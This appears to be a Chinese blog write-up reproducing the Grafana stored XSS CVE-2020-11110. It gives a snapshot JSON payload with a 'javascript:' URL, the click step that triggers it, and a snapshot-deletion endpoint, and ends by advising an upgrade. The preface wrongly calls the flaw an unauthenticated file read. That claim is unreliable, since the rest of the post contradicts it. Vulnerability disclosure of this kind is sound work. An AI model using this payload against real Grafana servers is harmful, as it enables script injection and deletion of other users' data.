Grafana 存储型XSS漏洞(CVE-2020-11110)

Grafana 存储型XSS漏洞(CVE-2020-11110)

本文转自starnight_cyber 并作补充

Preface

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

1
2
3
4
5
6
CVE编号:
    CVE-2020-11110
影响范围:
    Grafana v6.2.5
Links
    https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

复现记录

测试环境部署

1
2
payload => 
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}

image

Stored-XSS

替换 url 中的 localhost,访问快照地址,点击链接🔗图标。 Stored-XSS。

image

snapshot 快照删除

访问 deleteUrl:

http://103.210.xx.xx:3000/api/snapshots-delete/o3ITlrkiwgJexFmCJxr4gsNZ8QDcc0eQ

image

可以删除 snapshot,这里算是个严重程度更高的漏洞。

修复方案

版本升级。

Refer

https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

以上!